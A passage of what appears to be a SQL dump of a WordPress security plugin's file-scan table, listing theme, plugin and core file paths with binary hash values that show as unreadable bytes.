�y��y�O����Ċ�����','',0,'?'),('A��C41>����M<A�','wp-content/themes/wp-simple/inc/kirki/kirki/assets/js/controls/radio-image.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�B_-\rs��NJ+��','�	�2C�Zf��{N�\0~�{hR_ ~~�1���>U','',0,'?'),('A�.ߨ\'��t��1~�K\'','wp-content/themes/newsmag/inc/customizer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���)̓��5���\rʆ','|� e�o��k�o���\\��\r�ʊ�F#O��I','',0,'?'),('A��qtm5��зx�','wp-content/themes/education-hub/js/skip-link-focus-fix.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��eK�;\\�a:��','AU�iăm��6a�Byč -+!��T&�','',0,'?'),('A�?��&A��v� ��','wp-content/themes/Yegor/FT/plugin/options-framework/options-framework.php',0,'\"F�W�/��鱌7zl','\"F�W�/��鱌7zl','d���Q�:�g�l��Ntp�/1�D��>ā�','',0,'?'),('AаD^E�q\'�et\0�','wp-content/themes/event/header.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','bOHw��\'i1O���9�','��.	\Z��+u��֨�P�N\"�~?��4\'��q�','',0,'?'),('A��7�\0ί����E�','wp-content/themes/simpleshift/inc/kirki/includes/controls/class-kirki-controls-color-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','̭,�\r��2����&�','n��J\Z,8��Y8{\0R��f��m�~���QɹZ','',0,'?'),('Aػ#���\"���j�','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/views/403-roadblock.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�d�\\�ס\0�Ӹ���\Z�','؉(U�G�g�L��춗ږ\'GmD����','',0,'?'),('Aټ�ě�t��','wp-content/themes/Kent/js/custom.js',0,'��G��ٵ�]g\n~5�1�','��G��ٵ�]g\n~5�1�','V�2Zi�_F��U�vf\nA��1��-6�lt�D�','',0,'?'),('A����S�!K�v~LP','wp-content/themes/enigma/css/font-awesome-4.7.0/less/path.less',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��`�*O��P��?','�V���?��-,�f�.��{��D؏c|��','',0,'?'),('A�\\ݛ���-��7\Z�1','wp-content/plugins/wp-cerber/assets/flags/kh.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','*\0B/\ro��5��;�','m~�~�����B���)��~����D?��ID','',0,'?'),('A�CC�\Z^O��^Bz�','wp-content/themes/advance/inc/kirki/assets/js/controls/multicolor.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�D�=��Ln���6','V��uЍ�#�:��Q�2���L ��ű\Za','',0,'?'),('A��\\�6o\\�48�7��','wp-content/themes/simpleshift/assets/js/nicescroll.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����S��s2�Lyy�','�8I�6t���jlxL�u�ϓi8�vI��Qi����','',0,'?'),('A���$h��՝`Q�a','wp-content/plugins/akismet/index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�h�� P�Z�ݢ`Ef','��}���5�e�3��3��mhyD�Q(','',0,'?'),('B^��t�p�k���!�','wp-includes/sodium_compat/namespaced/Core/ChaCha20/IetfCtx.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','R�*L�TG��4%P���','-������n�F�J�&T�P�o\\ϓ\\����2���','',0,'?'),('B\n��N�PZ4���q�30','wp-content/themes/singularity/inc/customizer-options.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�,�R�](,\ry�-�;',',��\"���_�D�����f��+?�K��lHz�','',0,'?'),('B`�c!�l� f&8','wp-content/themes/catch-responsive/inc/catchresponsive-menus.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','jҙ��h>�E�n���j','�z������\Z[��7�\0�}�ɼ�@�Fh$|','',0,'?'),('BH�ay�l�Y��','wp-content/themes/education-hub/header.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�E��g��7$��e|t','�R�����d���Y�ޒe�/����s&�3�','',0,'?'),('B$�[\nfIZ&��[','wp-content/plugins/wp-cerber/assets/flags/na.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��� B�z�z��Q�\"�','���5�������o�]�-� �)�Qb~��\0�','',0,'?'),('BJ��O������z�D�','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/config.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��{�1�MR�KE_�/','|q�UUѿÎ|z��G>*�ۜ\"���I����;�','',0,'?'),('BO�IS�)D��\0��','wp-content/themes/metro-magazine/inc/extras.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��-�Nma�XU�%�K�','Y>%G�5*�;	�^٭��b��R�Œ�_����m�','',0,'?'),('BT\rߥ�5Ç�����','wp-content/themes/wp-simple/inc/kirki/assets/js/vendor/codemirror/theme/railscasts.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�f�G\n�W1�ڹ0(K','ߢ3��l��?$�nK��r��k�{��W�*�s�','',0,'?'),('BUj�v\\ѣ����(�','wp-content/plugins/wordfence/views/common/license.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��:8�����^�r','�f�B�-h������^�>A���nH0�\r&��','',0,'?'),('BW��@K,\n\Z��G','wp-content/themes/hitmag/inc/kirki/assets/js/vendor/codemirror/addon/edit/continuelist.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�-Y1���[=+��h','��7{��Z��HV�1j8�����^�b����','',0,'?'),('BY0�Y��]�vi��','wp-content/themes/enigma/images/portfolio2.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','+)8����@�n̳�Y%a','�8m���	s��j7*΍�wOZ�T��dt','',0,'?'),('B_�-�Th�+`ä�R','wp-content/themes/twentynineteen/sass/variables-site/_colors.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�	��N�x\\�\r�v/�','tG����ք��2�\ZF�]aY����Jb��p��','',0,'?'),('Bh��o�T�y��U�','wp-content/themes/simpleshift/inc/kirki/assets/js/controls/select.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��<�-k���F�ѝ�','˄ ��,���A�Ć\0?�l�س��&�C4�','',0,'?'),('Bq1\n@\r�H������^','wp-content/themes/edge/sidebar.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','pƳ+\\��C+�̡a�C','�έ ��KT��[����āg��:Q���94','',0,'?'),('Bt�al��]���L�O�','wp-includes/pomo/pomo/mo.php',0,'!	/�\"۵�$=�iU�','!	/�\"۵�$=�iU�','\rh�s�c��6Z$���P͡�\r!W%vD�~��j�','',0,'?'),('B��j�)��q�D�S','wp-admin/install-helper.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��W�Aoq�+C2Xd��','�W>�;��%֏6s�%T���v��#o(ʓ�','',0,'?'),('B�-�x����	7z�','wp-content/themes/catch-responsive/js/source/catchresponsive-scrollup.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���a�YYc�[��','�T�~F���#�6�8B�͗���6.Lj�','',0,'?'),('B�̠�T:�Y��x��_\0','wp-content/themes/simpleshift/inc/kirki/assets/css/customizer-dynamic-css-colors.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','!>�!V�)ܼXN��K�','�ڲ�����}ekA�����9_tu0{_.��','',0,'?'),('B����Q���aU�%','wp-content/plugins/wordfence/views/scanner/issue-knownfile.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�G^=�p�=$��\Z�2','�RK�6�����N\"3*\"�J�/0i�x0�','',0,'?'),('B��h�0��\"@6�`','wp-content/themes/advance/inc/kirki/includes/field/class-kirki-field-custom.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','w4z�:/X��(�X�','��aⓦhU�H �\r#j�⽋0!�;YD�k�','',0,'?'),('B�/��v�LD��V','wp-content/themes/graphene/images/social/spurl.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','U\r�!�����:8�6�','��O~���r�If��&���W�~�Ij\"OO�K�','',0,'?'),('B�m\rZ���*����U','wp-content/themes/gambit/css/themezee-widget-bundle.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','v��6��\'��&o�','��aK��h���չV�� �*��O��آa™W�','',0,'?'),('B���mR�ڗ�A	','wp-content/themes/hitmag/inc/kirki/assets/js/controls/editor.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�w6���*�A�.R��','�n��D�zK~���#�<6�������QD','',0,'?'),('B��ٿ�0a\0k��^�','wp-content/themes/hitmag/inc/kirki/assets/js/tooltip.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�]�L`CO����rk�','|]��yX�E��G�@��w!2��Ѣ�(','',0,'?'),('B�	�{>(V�!Oj�','wp-content/themes/event/js/event-main.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�+����,eY��u�V.','��j�O�j��:�}���11������녯;&','',0,'?'),('Bϵ���H@x���/','wp-content/plugins/wordfence/waf/pomo/po.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�vc+p*�\"G��?�B','�MO(��� G\rkHԽ�eq��	�Lj�F�o�O�-','',0,'?'),('B�P�X�W��6��','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Int64.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' �QA�L���󚜆U�','���G��\n<.\ZW�r���ʪ��Ø�)','',0,'?'),('B�R�Ru�֛�%��N�','wp-content/themes/saybusiness/js/isotope.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���4�|CY�m��4o.','���1����M/��0;#j���$��a��n�','',0,'?'),('B���&��\Z��','wp-content/themes/advance/inc/kirki/includes/field/class-kirki-field-radio-image.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Lذ�A/1�(����','��E΅Th3� g���]-yX�|/�Rc|��=�','',0,'?'),('B��!�\"v-�m��6�','wp-content/themes/exoplanet/images/exoplanet-header-thumbnail.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�k	w�h@l%hx�Z�sz','�]x\\���\'83��6]R�)\n�b\"�����E','',0,'?'),('CYJ��L��|�{H','wp-content/themes/simpleshift/assets/images/preview/deer.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ǰ�#�ݵ�!G:$','�כ��s�\ZޠP+G��r�5����II���','',0,'?'),('Ce�*�F�g�:v!��','wp-content/themes/wp-simple/inc/kirki/kirki/includes/class-kirki-helper.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�*Wg_#%;pb]���','\"�+�v1�;�<���M_G���;=tD�%i`$','',0,'?'),('C�ѹep<A��Cf','wp-content/themes/advance/inc/kirki/includes/lib/class-kirki-color.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','&q<���x�����vb�','��e|�TtĀk21�7��d�mr����Oꥆ�','',0,'?'),('C ����\rs98��y��','wp-content/themes/catch-responsive/images/body-bg-dark.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' �ZчwQ�j�o|H`1',',��T,~�K������^A�i�D�	����6�','',0,'?'),('C$&E[_U�F�7B?','wp-content/themes/university-hub/third-party/cycle2/js/jquery.cycle2.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','?8��Wt�nM�g�	O9z','l��4���`*��|t�\0�����9JX7���','',0,'?'),('C%��S(���5��','wp-content/themes/hitmag/inc/widgets/block-posts-dual.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','6y�\r�݂F��b�*�\0','�Ʈd���o����t�n�𠁽�+4lq/laG','',0,'?'),('C4��Ȝ��-�f�!-�','wp-content/themes/twentytwenty/assets/images/2020-landscape-1.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��n=⎼��t�NR�','�@m�o��ܛMbrђ����$ �z�\r�2�K=','',0,'?'),('CE^n���K��u(V�','wp-content/themes/advance/inc/kirki/assets/images/3cm.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���z��6�\"��','/��F��Z�\n�W�i<\no��>D��]�����','',0,'?'),('Ca�xF��Ê�^73�','wp-content/themes/gambit/css/themezee-related-posts.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\"(��9��Mo�4�','̊�UJ�d\0d!Y�)��7\0�	�]�Ei���','',0,'?'),('Ck�!�1/+γq[\0\rx�','wp-content/themes/wp-simple/inc/kirki/kirki/assets/js/vendor/codemirror/mode/htmlmixed/index.html',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\\zp>�Ɇ�\n6�A','���3�&񏒹�9����(f��*��Ic��EB','',0,'?'),('Cz�=�`7�m�D�*','wp-content/themes/Kent/single.php',0,'��R���R���W�7�','��R���R���W�7�','�������֐�?+�ٖ4	�S��F�\"X��	E','',0,'?'),('Cc�iF��h�.n7�','wp-includes/rest-api/endpoints/class-wp-rest-settings-controller.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','	�����)<�Q2�İ��','Pp�y�C���W7i~��g��`�����','',0,'?'),('C���I���S7�<','wp-content/plugins/wordfence/modules/login-security/views/page/page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ш>\\g��ǡ�$��c�','��ii��G�C����N�FL�)7%�ʙ�','',0,'?'),('C��/�@�l��Y��2}','wp-includes/css/dist/format-library/style-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�k(O�1m<�0v��vV','���1�q�XX|ί}Cw�}�o�]5F\n�~��','',0,'?'),('C�ؚ�T�R�!vF{','wp-includes/customize/class-wp-customize-nav-menu-item-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','*:Uț�J>��h�z','=��C����\0\"ȗ�gp�{��K�ϮD�\'�','',0,'?'),('C�A�z��I��|�','wp-content/themes/simpleshift/inc/kirki/assets/js/vendor/codemirror/theme/kirki-light.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','֝M{q5R��z�[)!','�8d;��/�Q�f��Z�\\A��i��6�YRi�','',0,'?'),('C�!}����YIw�b(A','wp-content/themes/authorize/assets/stylesheets/font-awesome/less/variables.less',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�?n�8����὞�n�','��� <mA;�u������F��C���?�\n','',0,'?'),('C��s\\�\n���s��\'m','wp-content/plugins/wordfence/lib/menu_tools_whois.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','bR��\'~��f�_D�','\Z�G�X\'~S�_AF��)t�iw�k�PELX6','',0,'?'),('Dm�\n��z�H��S���','wp-includes/images/crystal/document.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\'^c�s���D��3T\\','g�t�( Ŏ�k`5͒��J��M5���:j�','',0,'?'),('D\Z�UT3�y@�$�9�','wp-content/themes/event/js/source/html5.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���=�=GAFO��-�','ӈ�*��‰a�U��r\"�}a\Z\ZN��E�K��','',0,'?'),('D)�\n���+��?�&�?�','wp-content/themes/gambit/inc/customizer/sections/customizer-upgrade.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��l�@lC���[0w[','��Ռ}�~��YAފ\n��M�XpJōf��`�P̀','',0,'?'),('D.��:�\0��S�R8','wp-includes/ID3/module.audio-video.asf.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','^�Oo�x�&]��\\L','͆%F	��/\r���:�����0;>�_M3��w�','',0,'?'),('D6m�e�r{pK�O�','wp-includes/locale.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Ʋ\04�)o�ybU^�','�<�6n�\'�J�����_��	�S%��GVJ','',0,'?'),('D6�i@\n<�(��Hw','wp-content/themes/simpleshift/inc/kirki/assets/js/vendor/codemirror/addon/runmode/runmode.node.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ɯ�~=�*^Yj�:s','��{г%�����	�\Z�~c�$���Zi�','',0,'?'),('D6�\"�����g��Rh\'','wp-content/themes/singularity/inc/customizer-library/extensions/fonts.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�#C4�w�Y�h�%�a`','/�T)��Ы%υ���=	:��J����l�','',0,'?'),('D=n�vbP��._��','wp-content/themes/twentytwentyone/classes/class-twenty-twenty-one-custom-colors.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��UWn:s�zk]U`��','@�%H2Z6#���y�����U4I�-��','',0,'?'),('D?Pt5��|�cC�E�C','wp-content/themes/wp-simple/inc/kirki/kirki/assets/js/vendor/codemirror/keymap/emacs.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�_\'„Nn�쫅2s��','ʋ��w��A�3j6�L\Zp�3̞� U�pJ','',0,'?'),('DA��W��I�����','wp-content/themes/wp-simple/inc/kirki/kirki/assets/js/vendor/codemirror/mode/haml/haml.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�wt\'�A�w���','�I)��\\A���Q��q��Ed�o�>��M��','',0,'?'),('DU���uZ�F���Z','wp-content/plugins/wp-cerber/assets/flags/no.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���j.��#�0�P','2�!��u��6#=�%�ӹO���C4�	\Z���rM�','',0,'?'),('D`��q&2��','wp-content/themes/twentytwentyone/assets/sass/06-components/single.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��]H�9\0�$a�','c����f�����}�u���h���&����','',0,'?'),('Da�T�7�5��oX�','wp-content/themes/metro-magazine/images/bg-quote.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Z�#+�D����\0�i>E','� �@�J:.�8�t��H��\\4r�v\Z','',0,'?'),('Dcv�y���}7\n���\Z','wp-content/themes/wp-simple/inc/kirki/kirki/readme.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','bKjP�����{�Š�w2','V��������8���g��{i��E��*><��','',0,'?'),('Dm��u�ϣ�!�I�5H�','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Model/Isp.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��pٽ��P��]G���','�|�� )��Y�M��,3���0���\Z*�9�p','',0,'?'),('D|���jl���{\ry|','wp-content/themes/advance/inc/kirki/assets/scss/controls/number.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���;s�xq��%_t','*Cz��I�;�R*��$��wE�pv���Qp�','',0,'?'),('D�,����j�	��_','wp-content/themes/hitmag/inc/kirki/includes/class-kirki-selective-refresh.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Q�6zUc �ŧ�-���',')�\\���y}�B$��d�0�&��י����','',0,'?'),('D��ZY*�R�2���k','wp-content/themes/simpleshift/inc/kirki/assets/js/vendor/codemirror/addon/dialog/dialog.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ʘ�w�W�{�?�ڴ��}','j�M@X+�d�wӇ^QWs0�����Y�H','',0,'?'),('D���u�\r�‹�ɲ\Z','wp-content/plugins/wordfence/views/scanner/issue-commentBadURL.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��4Z?d����⢡','1XaRpLrIO%�%|\r��Vge\0�-b�^�n�=�','',0,'?'),('D����)ba�k��{��','wp-admin/includes/admin.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\'�\np�Z�,���v�','k�_DRH{���\0�#�6Z�~�}����u��V�','',0,'?'),('D�C����E[=���','wp-content/plugins/all-in-one-wp-security-and-firewall/admin/wp-security-filescan-menu.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\Z#/@�(C�`Њ�X��','�/k�#�R_���ElK�ʀ`J�T�*]X��|','',0,'?'),('D�z�;�Yݠ��l','wp-content/themes/auberge/includes/welcome/class-welcome.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���0�E1wp	L','���Ks\ni����[g�8���DE@��_V[','',0,'?'),('Dչ�����$Oa����','wp-admin/css/colors/ectoplasm/colors-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','!�S�S�_�Y�_3�f','ib��������itYz�Q.��F0��O^','',0,'?'),('D�E.Gྠb9k�8L=','wp-content/plugins/wp-cerber/assets/flags/hk.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','i.�@������C�_','�52Kx襹���*��Ȫ��b�B;b��*��\"�','',0,'?'),('D��!�iz��)�В��','wp-content/themes/monograph/comments.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','OH2���dY\\��=��','ϻh ���(��x�����1^�1�غ~���4�','',0,'?'),('D��d����:��#Ư�','wp-content/themes/hitmag/inc/kirki/includes/controls/class-kirki-controls-slider-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��C��@:v\0���','�s�#�\Z~�je��W�_&X\"�;����_GC4�s�','',0,'?'),('Dݎ��nMn��rTE�=','wp-content/themes/newsmag/assets/images/header.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��5����&�52p+L7','�hDP+���L4;���0�F�F+g�7[�����','',0,'?'),('D푂����}�{�%ֳ�','wp-content/themes/graphene/admin/options-display.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','XXQ0	=\"�dR:�r6','	u��P��Ü�e:��Ҟ\0�]���5�l�1','',0,'?'),('D�T[�-��U���','wp-content/plugins/wordfence/views/options/option-toggled-textarea.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','($h�c���1�h��','=zQ�o��5�?\0�d�_�\r���V5�M�j�N�?�','',0,'?'),('D��5\n\'�\\��~W��','wp-includes/category.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�`��k�3wh��k�͔','G�>�F|59��~�q|\n&\0��R	l�','',0,'?'),('D�%X��\0T\\7���I�','wp-content/plugins/wordfence/modules/login-security/css/admin.1623076348.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','S�%v#)��ݩ5��!�','B��i�x�����u\n�1܎ͺ2��{�','',0,'?'),('D�m�.�Ճ(G���','wp-content/themes/hitmag/inc/kirki/includes/settings/class-kirki-settings-repeater-setting.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','w�O�l��k��','����#9�K��K&QJ�A�s�ȁ�G�4z#�','',0,'?'),('E�B���#��_	','wp-content/themes/auberge/library/controls/class-WM_Customizer_Multiselect.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','rQ��O�3-0����','�{�b�Z0B��\0���B`1s�qG�x�}^p','',0,'?'),('E]GK\0lh�-0','wp-content/themes/Kent/comments.php',0,'L��d\r���P{^�Pe�','L��d\r���P{^�Pe�','�Tm�\0�Jm0-�{�|e:��|�6d�q�jw','',0,'?'),('E ӊ�>�/���eR�','wp-content/themes/gambit/template-fullwidth.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','&��ףï�vѓ�N��','���EY��WP=�.k�\rWE�g�7`L(j��@','',0,'?'),('E\"!t?��Ȥ���b6','wp-content/themes/wp-simple/inc/kirki/assets/js/controls/switch.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���2�oo\ZFK\0�B��a','��X=+�>dS����fPu�h�s����}:L�','',0,'?'),('E#���-v37�6�Ť','wp-content/plugins/wordfence/wordfence.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�F(e����韲7\Z.�','c�eEjˉ�\n��#;񐼽{��gul��r�p','',0,'?'),('E4�A׸���{,�X;','wp-content/themes/wp-simple/parts/frontpage-about.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ҍ�\0��,�Ep�9','�Υ�;��z��.����G�U���av�^9','',0,'?'),('E4��fu\r#R:k!jgh','wp-includes/js/wp-list-revisions.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���}�\Z�ۦ_��8K',']\r��o�8�Y�6��)ryW?�Y�����b�z(','',0,'?'),('E5�;����tR���$L�','wp-includes/js/dist/element.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' ����)��o��^\n�','l���\Z!:�Ϋ�?!���i����;�i�','',0,'?'),('E:�-q�w��-�X��e','wp-content/themes/wp-simple/parts/title.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','W%�:�6�>qo@���','~�C 9ƿ�\"�غ�fwe�[]��G��\\�[.','',0,'?'),('EJ�TW����D�)����','wp-content/plugins/all-in-one-wp-security-and-firewall/other-includes/wp-security-rename-login-feature-pre-5-7.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����f�qX�����','kO[0�Xn@�ȇr02]��-����\n,���8','',0,'?'),('ES��K[kV���','wp-content/themes/hitmag/inc/kirki/includes/output/field/class-kirki-output-field-multicolor.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\Z���D8�\n=0��','�v8z?��A3@7�x����3�;}q�O��OJ�','',0,'?'),('Eeб��Hf��\n\"�v�','wp-content/themes/brickyard/docs/assets/blueprint-css/plugins/link-icons/icons/external.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��F`7X#�g��8�Iй','oLa��H��\\�]\'��{��_�Ӕt�Pw�˹','',0,'?'),('Eh�������@aq��','wp-includes/session.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�NRM��<\\����>��','}����k+8M�U=<;��t����I*,�4#�','',0,'?'),('Eu�h���I�YJ��u:','wp-content/themes/singularity/taxonomy-board.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','H\0�\ZZ��e_<My��','�/S�z.�#��O�+�0�,^���&*�Uk','',0,'?'),('Ev���a�>¥�P�a�g','wp-content/themes/hitmag/inc/kirki/assets/scss/controls/editor.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','(һ��w�3JRqk','��(�;ȷ|��­������i��)B��h�I','',0,'?'),('EyI�5�-��J�s K','wp-content/themes/university-hub/functions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Cfj�-�O\0\"�G�-j(','\'��s;��:1]B�mW���%3�h��/� ','',0,'?'),('E��(�zRA1;eN�qD3','wp-content/plugins/wordfence/index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2��e��ª��\\�og','�� ��o���M�J#�A|�ߎ�(��;6R\n�','',0,'?'),('E�im�/��f\\��8+Z','wp-content/plugins/wp-cerber/assets/flags/gl.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���8�+xO,�o*�}9','J\'�Ѫ��(�6���֌�臚#��{�dp�I�','',0,'?'),('E�}�~��M��-�]�a','wp-admin/css/widgets.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Xl�Y}���q�\r���7$','��w�?�Z�L\0�ì*8��L_���5��`��','',0,'?'),('E���DVeOz����fr','wp-content/themes/simpleshift/inc/kirki/includes/field/class-kirki-field-checkbox.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','5�����}�P��f�','CX��%�.�wC���TA6B<�\"w���c�5� l','',0,'?'),('E����Y��W�T0�	)�','wp-content/themes/hitmag/template-parts/content-none.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','8�WA�������l?�','`�Z[�F(�g����m�芔�tr\Z�R�3.]�1','',0,'?'),('E�|Ѩ�J\n�_fB','wp-content/themes/advance/inc/images/layout1.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\"�?�H�t�u�ò','��t5��cz^∄=�P�G�7�$Pc���','',0,'?'),('E�V��,�%��,SM=','wp-admin/ms-edit.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','P3�\n��7|L?MtA���','a����c�sc\Z���\"�V�L\\�њ�','',0,'?'),('E�x���.�π�.�O-','wp-content/themes/simpleshift/inc/kirki/assets/js/controls/typography.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','J�~k���F���q�','�{U�L��u~ZV���5�������$�DR�','',0,'?'),('E�\rt��C�8W	